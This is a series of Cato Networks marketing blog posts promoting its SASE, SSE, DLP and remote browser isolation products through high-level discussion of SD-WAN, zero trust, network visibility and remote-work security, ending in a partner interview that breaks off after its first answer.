Corporate networks are rapidly becoming more complex and distributed. With the growth of cloud computing, remote work, mobile and Internet of Things (IoT), companies have...
5 Best Practices for Implementing Secure and Effective SD-WAN Corporate networks are rapidly becoming more complex and distributed. With the growth of cloud computing, remote work, mobile and Internet of Things (IoT), companies have users and IT assets everywhere, requiring connectivity.
Software-defined WAN (SD-WAN) provides the ability to implement a secure, high-performance corporate WAN on top of existing networks. However, SD-WAN infrastructures must be carefully designed and implemented to provide full value to the organization.
SD-WAN Best Practices
A poorly implemented SD-WAN poses significant risk to the organization. When designing and deploying SD-WAN, consider the following SD-WAN best practices.
Position SD-WAN Devices to Support Users
SD-WAN provides secure, optimized network routing between various locations. Often, organizations will deploy SD-WAN routers at their branch locations and near their cloud edge.
SD-WAN is also beneficial for remote workers. To ensure the solution provides the most optimal network connectivity, the SD-WAN solution must be deployed to maximize the performance of remote workers. This means minimizing the distance of remote traffic to the SD-WAN edge.
Use High-Quality Network Connectivity
SD-WAN is designed to improve network performance and reliability by intelligently routing traffic over different network connections, including broadband Internet, multi-protocol label switching (MPLS), and mobile networks. When traffic is sent to the SD-WAN device, it selects the most optimal path based on network conditions.
However, SD-WAN’s ability to enhance network performance and reliability is limited by the network connection at its disposal. If the available connection is inherently unreliable — like broadband Internet — then SD-WAN can do little to fix this problem. To maximize the value of an SD-WAN investment, it is essential to utlize a network connection that offers the desired level of performance, latency, and reliability.
Design for Scalability
Corporate bandwidth requirements are continuously increasing, and SD-WAN should be scalable to support current and future network requirements. Deploying SD-WAN using dedicated hardware limits the scalability of the solution and mandates upgrades or additional hardware in the future. Instead, companies should use an SD-WAN solution that takes advantage of cloud scalability to grow with the needs of the organization.
Integrate Security with Networking
SD-WAN is a networking solution, not a security solution. While it may securely and intelligently route traffic to its destination, it performs none of the advanced security inspection and policy enforcement needed to protect the organization and its employees against advanced cybersecurity threats.
For this reason, SD-WAN must be deployed together with network security. With the growth of remote work and the cloud, companies can’t rely on traffic flowing through the defenses at the network perimeter, and backhauling traffic defeats the purpose of deploying SD-WAN. A secure SD-WAN deployment is one that implements strong security with networking.
[boxlink link="https://www.catonetworks.com/resources/sase-vs-sd-wan-whats-beyond-security/"] SASE vs SD-WAN: What’s Beyond Security | Download the eBook [/boxlink]
Consider an Integrated Solution
Often, a company’s approach to implementing vital networking and security solutions is to deploy point solutions that provide the desired capabilities. However, this commonly results in a sprawling IT architecture that is difficult and expensive to monitor, operate, and manage.
Taking this approach to implementing a secure SD-WAN deployment can exacerbate this problem. Since each SD-WAN device must be supported by a full security stack, the end result is deploying and operating several solutions at each location.
SASE (Secure Access Service Edge) provides a solution for this problem. SASE integrates SD-WAN capabilities with a full network security suite delivered as a cloud-based security service. With SD-WAN, an organization can implement and secure its WAN infrastructure with minimal cost and operational overhead.
Implementing Secure, Usable SD-WAN with Cato SASE Cloud
Organizations can achieve the full benefits of SD-WAN only by designing and deploying it correctly.Doing so will avoid poor network performance, reduced security, and negative user experiences.
Cato SASE Cloud provides SD-WAN functionality designed in accordance with SD-WAN best practices and offers the following benefits to organizations:
Global Reach: Cato SASE Cloud is a globally-distributed network of over 80 PoP locations. This allows remote workers to access the corporate WAN with minimal latency.
Optimized Networking: Cato SASE Cloud is connected through a network of dedicated Tier-1 carrier links. These connections provide greater network performance and resiliency than an SD-WAN solution running over the public Internet.
Converged Security: As a SASE solution, Cato SASE Cloud converges SD-WAN with a full network security stack. This convergence offers advanced threat protection without compromising network performance or user experience.
Cloud-Based Deployment: Cato SASE Cloud is deployed as a global network of PoPs connected by a global private backbone. As a result, it can offer greater scalability, availability, and resiliency than on-site, appliance-based solutions.
Managed SD-WAN: Cato SASE Cloud is available as a Managed SD-WAN service. This removes the responsibility for configuring, managing, and updating your SD-WAN deployment.
SD-WAN helps improve network performance, but it also introduces potential security risks. The Cato SASE Cloud solves this by converging SD-WAN and network security into a single software stack built upon a network of PoPs and connected by a global private backbone. Learn more about how implementing SD-WAN and SASE with Cato SASE Cloud can optimize your organization’s network performance and security.
Many organizations are in the midst of rapid digital transformation. In the past few years, numerous new and promising technologies have emerged and matured, promising...
Digital Transformation Is a Major Driver of Network Transformation Many organizations are in the midst of rapid digital transformation. In the past few years, numerous new and promising technologies have emerged and matured, promising significant benefits. For example, many organizations are rapidly adopting cloud computing, and the growing maturity of Internet of Things (IoT) devices has the potential to unlock new operational efficiencies.
At the same time, many organizations are changing the way that they do business, expanding support for remote and hybrid work policies. This also has impacts on companies’ IT architectures as organizations adapt to offer secure remote access to support a growing work-from-anywhere (WFA) workforce.
New Solutions Have New Network Requirements
As digital transformation initiatives change how companies do business, corporate networks and IT architectures need to adapt to effectively and securely support the evolving business.
Digital Transformation is driving new network requirements including the following:
Remote Access: One of the biggest impacts of Digital Transformation is the growing need for secure remote access to corporate applications and systems. Remote workers need the ability to securely access corporate networks, and everyone requires secure connectivity to Cloud and Software as a Service (SaaS) solutions.
Network Scalability: The expansion of corporate IT architectures to incorporate new technologies drives a need for more network bandwidth. Networking and security technologies must scale to meet growing demand.
Platform Agnosticism: As companies deploy a wider range of endpoints and technology solutions, implementing and enforcing consistent, effective policies require a solution that works for any device and from anywhere.
Decentralized Security: Historically, companies have taken a perimeter-focused approach to network security. As digital transformation dissolves this perimeter, organizations need network security solutions that provide service everywhere their users are.
[boxlink link="https://www.catonetworks.com/resources/the-business-case-for-wan-transformation-with-cato-cloud/"] The Business Case for WAN Transformation with Cato Cloud | Download the eBook [/boxlink]
Developing a Network Transformation Strategy
A network transformation strategy should be designed to meet the new and evolving requirements driven by digital transformation.
Some of the key factors to consider when designing and implementing a network transformation strategy include:
Accessibility: Digital transformation initiatives commonly make corporate networks more distributed as remote users, cloud applications, and mobile devices connect to corporate resources from everywhere. A network designed to support the modern digital business must provide high-performance, secure access wherever users and applications are.
Scalability: As companies deploy new technologies, their bandwidth requirements continue to grow. Networking and security solutions must be designed and implemented to easily scale to keep pace with the evolving business needs.
Performance: Cloud applications are performance-sensitive, and inefficient networking will impact performance and user productivity. A network transformation project should ensure traffic is intelligently routed over the corporate WAN via high-performance, reliable network connectivity.
Security: As users and applications move off-premise, they dissolve the network perimeter where, traditionally, companies have focused their security protection. Network transformation projects should include decentralized network security to ensure inspection and policy enforcement occurs closest the user or application.
Reaching Network Transformation Goals with Cato SASE Cloud
Companies undertaking digital transformation initiatives should look for network and security technologies designed for the modern, distributed enterprise.
SASE (Secure Access Service Edge) solutions offer various features designed to support digital and network transformation, including:
Software-Defined WAN (SD-WAN): SD-WAN optimally routes network traffic over the corporate WAN. By monitoring link health and offering application-aware routing, SD-WAN optimizes the performance and reliability of the corporate WAN.
Cloud-Based Deployment: SASE solutions are deployed in the cloud. This removes geographic limitations and enables them to leverage cloud scalability and flexibility.
Integrated Security: SASE combines SD-WAN and network security into a single software stack. This enables traffic to be inspected, apply networking and security policies in a single pass, and then routed to its destination.
Consist Policy Enforcement: SASE’s global cloud architecture ensures network and security policies are consistently enforced no matter where the users and applications are.
Cato SASE Cloud is a managed SASE platform that offers enterprise-grade security and optimized network routing over a global network of redundant Tier-1 carrierlinks. Learn more about how Cato SASE Cloud can help your organization meet its digital transformation goals.
ChatGPT is all the rage these days. Its ability to magically produce coherent and typically well-written, essay-length answers to (almost) any question is simply mind-blowing....
ChatGPT and Cato: Get Fish, Not Tackles ChatGPT is all the rage these days. Its ability to magically produce coherent and typically well-written, essay-length answers to (almost) any question is simply mind-blowing. Like any marketing department on the planet, we wanted to “latch onto the news." How can we connect Cato and ChatGPT?
Our head of demand generation, Merav Keren, made an interesting comparison between ChatGPT and Google Search. In a nutshell, Google gives you the tools to craft your own answer, ChatGPT gives you the outcome you seek, which is the answer itself. ChatGPT provides the fish, Google Search provides the tackles.
How does this new paradigm translate into SASE, networking, and security? We have discussed at length the topic of outcomes vs tools. The emergence of ChatGPT is an opportunity to revisit this topic.
Historically, networking and network security solutions provided tools for engineers to design and build their own “solutions” to achieve a business outcome. In the pre-cloud era, the two alternatives on the table were Do-it-Yourself or pay someone else to Do-it-for-You). The tools approach was heavily dependent on budget, people, and skills to design, deploy, manage, and adjust the tools comprising the solution to make sure they continuously deliver the business outcome.
Early attempts to build a “self-driving” infrastructure to sustain desired outcomes didn’t take off. For example, intent-based networking was created to enable engineers to state a desired business outcome and let the “network” implement low-level policies to achieve it. Other attempts like SD-WAN fared better because the scope of desired outcomes was more limited and the infrastructure more uniform and coherent.
[boxlink link="https://www.catonetworks.com/resources/outcomes-vs-tools-why-sase-is-the-right-strategic-choice-vs-legacy-appliances/?utm_medium=blog_top_cta&utm_campaign=features_vs_outcomes"] The Pitfalls of SASE Vendor Selection: Features vs. Strategic Outcomes | Download the White Paper [/boxlink]
Thinking about IT infrastructure as enabling business outcomes became even more elusive as complexity grew with the emergence of digital transformation. Cloud migration and hybrid cloud, SaaS usage proliferation, growing use of remote access, and the expansion of attack surface to IoT have strained the traditional approach of IT solution engineering of applying new tools to address new requirements.
In this age of skills and resource scarcity, IT needs to acquire “outcomes” not mere “tools.”
There is an important distinction here between legacy and modern outcome delivery. Legacy outcome delivery is typically associated with service providers. They use tools to engineer a solution for customers, and then use manpower to maintain and adapt the solution to deliver an agreed upon outcome. To ensure they meet the committed outcomes, customers demand and get SLAs backed by penalties. This business structure silently acknowledges the fact that a service provider is fundamentally using the “same” headcount to achieve an outcome without any fundamental advantage over the customer’s IT. Penalties serve to motivate the service provider to deploy sufficient resources to deliver what the customer is paying for.
Modern outcome delivery is built on cloud native service platforms. It is built with a software platform that can adapt to changes and emerging requirements with minimal human touch. Most engineering goes into enhancing platform capabilities not managing it to specific customer needs.
This is where Cato Networks shines. Once a customer onboards into Cato, our platform is designed to continuously deliver “a secure and optimal access for everyone and everywhere” outcome without the customer having to do anything to sustain that outcome. The Cato SASE Cloud combines extreme automation, artificial intelligence, and machine learning to adapt to infrastructure disruptions, geographical expansion, capacity changes, user-base mobility, and emerging threats. While highly skilled engineers enhance the platform capabilities to seamlessly detect and respond to these changes, they do not get involved in the platform decision making process that is largely self-driving. Simply put, much of the customer experience lifecycle with Cato is fully and truly automated and embodies massive investment in outcome-driven infrastructure that is fully owned by Cato.
What this means is that any customer that onboards into Cato immediately experiences the networking and security outcomes typical of a Fortune 100 enterprise, in the same way an average content writer could deliver better and faster outcomes when assisted by the outcome driven ChatGPT.
If you want a fresh supply of fish coming your way as “Cato Outcomes”, take us for a test drive. Tackles are included, yet optional.
Most modern companies are highly reliant on their IT infrastructure for day-day business, with employees relying on numerous on-prem and cloud-based software solutions for their...
Why Network Visibility is Essential for Your Organization Most modern companies are highly reliant on their IT infrastructure for day-day business, with employees relying on numerous on-prem and cloud-based software solutions for their daily activities.
However, for many companies, the network can be something of a black box. As long as data gets from point A to point B and applications continue to function, everything is assumed to be okay. However, the network can be a rich source of data about the state of the business. By monitoring network traffic flows, organizations can extract intelligence regarding their IT architectural design and security that can enhance IT efforts and inform business-level decision making and strategic investment.
What Type of Data Can Network Monitoring Provide?
Companies commonly achieve visibility into data flowing through the network via in-line monitoring solutions or network taps.
With access to the network data, an organization can perform analysis at different levels of granularity. One option is to analyze network data at a high-level to extract the source, destination, and protocols to baseline the network behavior patterns.
Alternatively, an organization can dig deeper into the network packet payload to determine if it contains malware or other malicious content that places the organization at risk.
Use Cases for Network Visibility
Comprehensive network visibility provides significant benefits to network and security teams alike, and both can take advantage of this to improve network analysis, performance, and security.
[boxlink link="https://www.catonetworks.com/resources/achieving-zero-trust-maturity-with-cato-sse-360/"] Achieving Zero Trust Maturity with Cato SSE 360 | Download the White Paper [/boxlink]
Advanced Threat Detection
Advanced threat detection solutions, such as a next-generation firewall (NGFW) or intrusion prevention system (IPS), commonly rely upon network traffic analysis. They inspect traffic flows for indicators of compromise (IoCs) such as malware or known malicious domains. Based on its analysis, the NGFW or IPS can generate an alert for security personnel or take action itself to block the malicious traffic flow from reaching its intended destination.
Zero Trust Security
Zero Trust is based on the principle of least privilege. Devices, applications, and users are granted access to corporate resources based on a variety of criteria including identity, device posture, geo-location, time-of-day, etc., and is constantly validated for fitness to remain on the network. Comprehensive network visibility is essential for implementing tighter security, including Zero Trust, and without it, organizations remain at extreme risk.
Companies commonly implement traffic filtering to prevent employees from visiting dangerous or inappropriate websites and to block malicious traffic flow. These traffic filters rely on the ability to inspect the packet contents and block it appropriately.
However, this protection is commonly limited to the network perimeter where organizations typically inspect and filter traffic. With full network visibility, an organization is able to protect all of its office and remote employees.
Data Loss Prevention
Data loss prevention (DLP) is a vital component of a corporate data security program since it can help identify and block the exfiltration of sensitive business data. DLP solutions work by inspecting network traffic for specific information like file types and data types associated with sensitive data, or potential compliance violations, and then applying policies to prevent data leakage. This is only achievable with enhanced network visibility.
Connected Device Visibility
Many companies lack full visibility into the devices connected to their networks. This lack of visibility can introduce significant security risks as unknown or unmanaged devices may have unpatched vulnerabilities and security misconfigurations that place them and the corporate network at risk. Network traffic analysis can help companies to gain visibility into these connected devices. By monitoring network traffic, an organization can map the devices, and identify unknown and unmanaged devices.
Anomalous Traffic Detection
Network monitoring allows organizations to identify common traffic patterns and potential traffic anomalies. These anomalies could point to issues with corporate systems or a potential cyberattack. Unusual traffic flow could be an indication of lateral movement by an attacker, communication to a command and control server, or attempted data exfiltration.
Network Usage Monitoring and Mapping
Understanding common network traffic patterns can also help inform an organization’s strategic planning. For example, understanding an application’s traffic and usage patterns could highlight unknown bandwidth requirements and help the organization’s cloud migration strategy to ensure maximum performance with minimal latency.
Enhancing Network Visibility with Cato SASE Cloud
To achieve network visibility, companies need strategically deployed solutions that can monitor and collect data on all traffic flowing over the corporate network. As remote work and cloud adoption make networks more distributed, this becomes more difficult to achieve.
SASE (Secure Access Service Edge) provides a means for companies to achieve network visibility across the corporate WAN. The Cato SASE Cloud converges SD-WAN and security capabilities, allowing all WAN traffic to flow across a global private backbone. This in-depth visibility allows all network and security traffic to be inspected, and all policies applied at the ingress PoP closest to the user or application. This ensures that policy enforcement is consistent across the corporate network.
The Cato SASE Cloud is a managed SASE solution that provides comprehensive network visibility and security for a high-performance, global WAN. Learn more about how Cato SASE Cloud can help improve your organization’s network visibility, security, and performance.
Trust is a serious issue facing enterprise architectures today. Legacy architectures are designed on implicit trust, which makes them vulnerable to modern-day attacks. A Zero...
Achieving Zero Trust Maturity with Cato SSE 360 Trust is a serious issue facing enterprise architectures today. Legacy architectures are designed on implicit trust, which makes them vulnerable to modern-day attacks. A Zero Trust approach to security can remedy this risk, but transitioning isn’t always easy or inexpensive. CISA, the US government’s Cybersecurity and Infrastructure Security Agency, suggests a five-pillar model to help guide organizations to zero trust maturity.
In this blog post, we discuss how Cato SSE 360 helps facilitate Zero Trust Maturity based on CISA’s model. To read a more in-depth and detailed review, read the white paper this blog post is based on, here.
What is Zero Trust?
Today’s Work-From-Anywhere (WFA) environment requires a paradigm shift away from the traditional perimeter-centric security model, which is based on implicit trust. But in modern architectures, there are no traditional perimeters and the threats are everywhere.
A Zero Trust Architecture replaces implicit trust with a per-session-based (explicit trust) model. This ensures adherence to key Zero Trust principles: secure communications from anywhere, dynamic policy access to resources, continuous monitoring and validation, segmentation, least privilege access and contextual automation.
[boxlink link="https://www.catonetworks.com/resources/achieving-zero-trust-maturity-with-cato-sse-360/"] Achieving Zero Trust Maturity with Cato SSE 360 | Download the White Paper [/boxlink]
CISA Zero Trust Maturity and Cato SSE 360
Zero trust is a journey and the path to zero trust maturity is an incremental one. CISA’s Zero Trust Maturity Model helps enterprises measure this journey based on five pillars: Identity, Devices, Networks, Applications and Data.
Let’s examine the Cato SSE 360 approach to these.
Pillar 1 - Identity
The core of Zero Trust is ensuring user credentials are correctly and continuously verified, before granting access to resources. Cato SSE 360 leverages IdPs to enforce strict user identity criteria. Using TLS, identity and context are imported over LDAP or provisioned automatically via SCIM, and authorized users are continuously re-evaluated.
Pillar 2 - Devices
With zero trust, device risk is managed through Compliance Monitoring and Data Access Management. Validation includes all managed devices, IoT, mobile, servers, BYOD and other network devices. Cato SSE 360 combines Client Connectivity and Device Posture capabilities with 360-degree threat protection techniques to protect users, devices and resources. Cato has in-depth contextual awareness of users and devices for determining client connectivity criteria and device suitability for network access.
Pillar 3: Network/Environment
To achieve the zero trust principles of Network Segmentation, Threat Protection and Encryption, a new, dynamic architecture is required. Cato SSE 360 provides such a dynamic security architecture and the network infrastructure to achieve these principles. Cato delivers 360-degree security with FWaaS, IPS, SWG, CASB, DLP and NextGen Anti-Malware, while enforcing Zero Trust policies at the cloud edge. In addition, Cato SSE 360 enables micro-segmentation, provides modern encryption, and uses AI and Machine Learning to extend threat protection.
Pillar 4: Application Workloads
Wherever enterprise and cloud applications reside, the CISA Maturity Model dictates they receive Access Authorization, Threat Protection, and Accessibility. Cato SSE 360 ensures consistent access policy enforcement, regardless of the application location, user and device identity, or access method. Cato also provides threat hunting capabilities to extend security by identifying hidden threats to critical applications.
Pillar 5 - Data
To protect data, access needs to be provided on the least privileged basis and data needs to be encrypted. Cato SSE 360 inspects and evaluates users and devices for risk. In addition, advanced threat protection for data is enabled with tools like CASB, IPS, NextGen Anti-malware, FWaaS and DLP.
Cato SSE 360 neatly wraps around the CISA model, delivering visibility, analytics and automation across all pillars to facilitate dynamic policy changes and enforcement, and enriched contextual data for accelerated threat response.
Zero Trust Maturity with Cato
Cato SSE 360 facilitates zero trust with a cloud-native architecture that places user and device identity with global consistency at the center of its protection model. Cato SSE 360 controls and protects access to sites, mobile users, devices and enterprise and cloud resources, in compliance with Zero Trust principles. As a result, Cato’s approach to Zero Trust makes achieving Zero Trust Maturity easier for the modern enterprise.
To learn more, read the white paper.
Last year, we launched Cato DLP to great success. It was the first DLP engine that could protect data across all enterprise applications without the...
Updated Cato DLP Engine Brings Customization, Sensitivity Labels, and More Last year, we launched Cato DLP to great success. It was the first DLP engine that could protect data across all enterprise applications without the need for complex, cumbersome DLP rules. Since then, we have been improving the DLP engine and adding key capabilities, including user-defined data types for increased control and integration with Microsoft Information Protection (MIP) to immediately apply sensitivity labels to your DLP policy. Let's take a closer look.
User Defined Data Types
Cato provides over 300 pre-defined out-of-the-box data types and categories for typical scenarios of DLP policies. However, sometimes organizations require the ability to create custom-defined data types to match specific data inspections that are not covered by the pre-defined types.
To customize content inspection for your DLP policies, you can now define keywords, dictionaries, and regular expressions. Regular expressions allow for more accurate detection and prevention of data loss incidents, without impacting legitimate business operations. For example, you can use regular expressions to detect specific data patterns, such as email addresses with a string containing the keywords "Bank Account Number" and an 8-to-17-digit number.
Cato DLP configuration screen showing customized data types to meet individual requirements.
MIP Sensitivity Labels
In addition, we recently added the support for MIP as another user defined data type. MIP offers sensitivity labels that enable organizations to classify their data based on their sensitivity level. The MIP classification system allows for greater control over how data is accessed, shared, and used within the organization.
[boxlink link="https://www.catonetworks.com/resources/protect-your-sensitive-data-and-ensure-regulatory-compliance-with-catos-dlp/"] Protect Your Sensitive Data and Ensure Regulatory Compliance with Cato’s DLP | Download the White Paper [/boxlink]
By using sensitivity labels, organizations can ensure that sensitive data is only accessed by authorized personnel, while still enabling productivity and collaboration. After integrating Sensitivity Labels and adding them to a Content Profile, the DLP engine immediately enforces them for relevant traffic. For better policy granularity, create separate DLP rules to manage content access for different users and groups based on MIP labels.
For instance, a law firm that classified all their documents with MIP labels, can easily reuse the label in the Cato DLP policy to only allow senior partners to access certain documents.
MIP Sensitivity Labels are now supported in Cato DLP
Cato: Advanced Protection Everywhere – In an Instant
With the changes, Cato DLP brings advanced content inspection capabilities that combine data inspection with contextual information based on the full range of Cato’s Networking and Security engines. This unique approach provides greater accuracy and reduces false positives, resulting in a more efficient and effective DLP solution.
But, of course, the real distinction of Cato DLP is that it’s part of the Cato SASE Cloud platform. As a global cloud-native platform, Cato SASE Cloud brings DLP along with FWaaS, SWG, ZTNA, CASB, RBI, and more to remote users and locations everywhere in just a few clicks. Click to learn more about Cato SASE Cloud and about SASE.
Today Cato Networks announced the addition of the Cato RBI to our Cato SASE Cloud platform. It is an exciting day for us and for...
Q&A Chat with Eyal Webber-Zvik on Cato RBI Today Cato Networks announced the addition of the Cato RBI to our Cato SASE Cloud platform. It is an exciting day for us and for our customers. Why? Because Cato’s cloud-native, security stack just got better, and without any added complexity.
I sat down with Eyal Webber-Zvik, Vice President of Product Marketing and Strategic Alliances at Cato Networks, and asked him to provide his perspective on what is Cato RBI and what this means for Cato’s customers.
Why should enterprises care about RBI?
Enterprises need to care because with new websites popping up every day, they face a dilemma between the security risk of allowing employees to access uncategorized sites and the productivity and frustration impact of preventing this. With Cato RBI now integrated into our Cato SASE Cloud platform, we are giving enterprise IT teams the best of both worlds: productivity and security.
What is Cato RBI and why do enterprises need it?
Cato RBI is a security function that protects against malicious websites by running browser activity remotely from the user’s device, separating it from the web content. Cato RBI sends a safe version of the page to the device so that malicious code cannot reach it, without affecting the user experience.
Enterprises need Cato RBI to protect employees from malicious websites that are not yet blacklisted as such. When employees do reach unknown and malicious sites, Cato RBI protects the business by preventing code from running in their browsers. Cato RBI protects from human error while also saving users from the frustration of being blocked from unknown websites.
How does Cato RBI work?
An isolated browser session is set up, remote from the user’s device, which connects to the website and loads the content. Safe-rendered content is then streamed to the users’ browsers. Malicious code does not run on the user’s device and user interaction can be limited, for example, to prevent downloads.
Some solutions require that every browsing session uses RBI, but it is better invoked, when necessary, for example by a policy that is triggered when a user tries to visit an uncategorized website.
Cato RBI gives IT administrators a new option for uncategorized websites. Alongside “Block” and “Prompt,” they can now choose “Isolate.” Configuration of Cato RBI can be done in less than one minute by a customer’s IT administrator.
What if an enterprise already uses SWG, CASB, Firewall, IPS and/or anti-malware? Why do they need Cato RBI?
These solutions protect against a wide range of threats, but Cato RBI adds another important layer of protection specifically against web- and browser-based threats, such as phishing, cookie stealing, and drive-by downloads. Since Cato RBI prevents code from reaching devices, it will help protect a business against:
New attacks that are not documented.
New malicious sites that are not categorized.
User error, such as clicking on the link in a phishing email.
Cato RBI gives enterprises more peace of mind. It may allow organizations to operate a more relaxed policy on access to unknown websites, which is less intrusive and frustrating for users, who in turn will raise fewer tickets with their IT team.
What types of cyber threats does Cato RBI protect against?
Cato RBI provides protection against a wide range of browser-based attacks such as unintended downloads of malware and ransomware, malicious ads, cross-site scripting or XSS, browser vulnerabilities, malicious and exploited plug-ins, and phishing attacks.
What are the benefits of Cato RBI for enterprises and users?
There are five immediate benefits when using Cato RBI. They are:
To make web access safer by isolating malicious content from user devices.
To prevent your data from being stolen by making it more difficult for attackers to compromise user devices.
To protect against phishing email, ransomware, and malware attacks, by neutralizing the content in the target websites.
To defend against zero-day threats by isolating users from malicious websites that are new and not yet categorized.
To make users more productive by allowing them to visit websites even though they are not yet known to be safe.
Does Cato collaborate with other companies to offer Cato RBI?
Yes. We partner with Authentic8, a world leader in the field of RBI. Authentic8 is chosen by hundreds of government agencies and commercial enterprises and offers products that meet the needs of the most regulated organizations in the world. Authentic8’s RBI engine is cloud-native and globally available, and the integration into our Cato SASE Cloud is seamless and completely transparent.
Follow the links to learn more about Cato RBI, and about our SASE solution.
An enterprise network strategy helps organizations maximize connectivity between end-user devices and applications so they can achieve positive business outcomes. But not all organizations know...
The Enterprise Network Cookbook An enterprise network strategy helps organizations maximize connectivity between end-user devices and applications so they can achieve positive business outcomes. But not all organizations know how to build a comprehensive enterprise network strategy on their own.
A new report by Gartner guides Infrastructure & Operations (I&O) leaders in creating a dynamic enterprise network strategy that connects business strategy to implementation and migration plans. In this blog post, we bring attention to the main highlights of their recommendations. You can read the entire “Enterprise Network Cookbook", complimentary from Cato, here.
Executive Summary - Communicates the summary to senior management. It should include the different stakeholder roles and the expected business outcomes. It is recommended to write this last.
Business Baseline - A summary of the top-level business strategy, the desired business outcomes and business transformation initiatives. The baseline should also cover potential benefits and risks and explain how to overcome challenges.
Campus and Branch Baselines - The organization’s guiding principles for campuses and branches. For example, wireless first, IoT segmentation, or network automation.
WAN Edge Baselines - Principles for the WAN edge, like redundant connectivity design or optimization of WAN for cloud applications.
Data Center and Cloud Networking Baselines - Cloud and data center principles. It is recommended to properly emphasize the importance of the data center and ensure automation by default.
[boxlink link="https://www.catonetworks.com/resources/gartner-the-enterprise-network-cookbook/"] Gartner® The Enterprise Network Cookbook | Download the Report [/boxlink]
Gartner’s Cookbook includes two sections of brainstorming and discussions when determining the main principles that will drive the enterprise networking strategy:
Services Strategy Brainstorming - The strategy that determines how security and management applications are consumed, both on-premises and from the cloud. This section should cover a variety of use cases, including infrastructure as a service, platform as a service and SaaS, a hybrid IT operating model, which applications remain on-premises, etc.
Financial Considerations - The financial implications of the enterprise network on corporate financial models. This section includes considerations like cost transparency, visibility, budgeting, asset depreciation predictability and funding sources.
Gartner also details what they consider the most important section of the enterprise network strategy:
Inventory - In this section, list the inventory of the equipment and how it is deployed for the purpose of discovering each item and ensuring it is part of the enterprise network. Make sure to detail the component’s location, vendor, cost, use case requirements, integrations, etc. If you have too many components, focus on the core network.
The enterprise network strategy needs to align with existing strategies so it doesn’t reinvent or contradict them. It should align with:
Security - Including security principles, responsibilities, and compliance
Organizational and Staffing Issues - Enterprise networking will change staffing and HR requirements, since the new strategy will require different skill sets.
Migration Strategy - A strategy for replacing legacy technologies. The strategy should take into consideration functionality, contract and service level agreements. Both technical and business factors should be present in the migration strategy.
Now that you’ve answered the “what” and “why” questions, you can move on to the implementation plan, i.e the “how” and the “when”. But even if you’ve already started implementation, developing a network strategy document can help you continue to implement in a more effective way that addresses your organizational needs. Therefore, it is recommended to create a network strategy plan, no matter how far into the implementation you are.
Read more details from Gartner here.
Remote or hybrid work have become the de facto standard for many companies, post-pandemic, as more employees demand more flexible workplace policies. Therefore, organizations looking...
Ensuring Secure, Scalable, and Sustainable Remote Access for the Hybrid Workforce Remote or hybrid work have become the de facto standard for many companies, post-pandemic, as more employees demand more flexible workplace policies. Therefore, organizations looking to support hybrid work will require a long-term strategy that ensures their infrastructure is equipped to securely facilitate this new flexible work environment.
Remote Work Creates New Security Needs
The corporate workforce has, historically, been tethered to office configurations that made it easier to provide secure access to corporate applications. Traditional perimeter-based network security solutions would inspect and filter traffic before it passed through the network boundary. However, this has become much more complex because the age of the hybrid workforce dictates that we rethink this approach to ensure we provide the strongest possible protection against cyber threats for remote and office workers.
While security threats present the modern enterprise with numerous challenges, the more specific challenges associated with remote work include the following:
Secure Remote Access: Remote workers accessing corporate networks and applications over untrusted, public networks place themselves and the company at greater risk of cyber threats. These employees require reliable, secure remote access to ensure network connectivity to a remote site. Additionally, this secure connectivity, along with advanced threat defense ensures protection for allusers, applications and service against potential cyber threats.
Cloud Security: A significant amount of remote worker traffic goes to cloud-based business applications. Backhauling this traffic through corporate networks for inspection and policy enforcement is inefficient and impacts network performance and user experience.
Secure Internet Access: Direct Internet access is a common expectation for remote workers. However, this deprives employees of enterprise security protections, and backhauling through the corporate data center adversely impacts network performance and user experience.
Advanced Threat Protection: Companies commonly have next-generation firewalls (NGFWs) and other advanced threat protection solutions deployed at the network perimeter. Without these protections, remote employees are more at risk of cyber threats.
[boxlink link="https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/"] Why remote access should be a collaboration between network & security | Download the White Paper [/boxlink]
Key Requirements for Remote Work Security
The rise of remote work and the cloud has rendered traditional, perimeter-focused security solutions obsolete. If a significant percentage of an organization’s users and IT assets sit outside of the protected network, then defending that perimeter provides the organization with limited protection against cyber threats.
As hybrid work becomesthe de facto standard for business, organizations will require a purpose-built infrastructure designed to offer high-performance secure remote access, and advance threat protection.
Key solution requirements will include:
Geographic Reach: Hybrid workers require secure and consistent anytime, anywhere access, so remote access solutions must ensure that a company can protect its remote employees while providing consistent security and performance no matter where they are.
Direct Routing: Backhauling remote traffic to the corporate data center for inspection adds latency and dramatically impacts network performance and the user experience. Security policies for remote workers must be easily applied and enforced while maintaining a great user experience.
Consistent Security: Consistent security and policy enforcement across the entire enteprise, including the remote workforce is a must.
Resiliency: Remote work is commonly a component of an organization’s business continuity plan, enabling business to continue if normal operations are disrupted. A security solution for remote workers should maintain operations despite any network interruptions.
SASE and SSE Provides Secure Network Connections to Remote Sites
Secure Access Service Edge (SASE) is a cloud-based solution that converges network and network security, and enables companies to implement strong, consistent security for their entire workforce. This combination ensures that corporate network traffic undergoes security inspection en route to its destination with minimal performance impact. Additionally, a cloud-based deployment enhances the availability, scalability, and resiliency of an organization’s security architecture while delivering consistent policy enforcement.
Securing the Remote Workforce with Cato SASE Cloud
The Cato SASE Cloud is the convergence of networking and security into a single software stack and is built upon a global private backbone that provides network performance and availability guaranteed by a 99.999% SLA. With the Cato SASE Cloud, remote workers gain secure access to corporate applications and services along with advanced threat protection. Additionally, Cato’s global network of SASE PoPs ensures that companies have security policy enforcement without compromising on network performance.
The evolution of the hybrid workforce is dictating that organizations rethink their remote access strategies. Learn more about how Cato SASE Cloud can help your organization adapt to its evolving networking and security requirements.
Windstream Enterprise recently announced the arrival of North America’s first and only comprehensive managed Security Service Edge (SSE) solution, powered by Cato Networks—offering sophisticated and...
A sit down with Windstream Enterprise CTO on Security Service Edge Windstream Enterprise recently announced the arrival of North America's first and only comprehensive managed Security Service Edge (SSE) solution, powered by Cato Networks—offering sophisticated and cloud-native security capabilities that can be rapidly implemented on almost any network for near-immediate ironclad protection. In the spirit of partnership, we sat down with Art Nichols, CTO of Windstream, to share insights into this SSE announcement and what this partnership brings to light.
Why did you decide to roll out SSE?
We are excited to expand upon our single-vendor security offerings with the launch of this single-vendor cloud-native SSE solution, powered by Cato Networks. This SSE architecture delivers near immediate and cost-effective ways for clients to protect their network, and the users and resources attached to it. It also supports the expanded remote access to cloud-based applications that customers and employees alike must utilize.
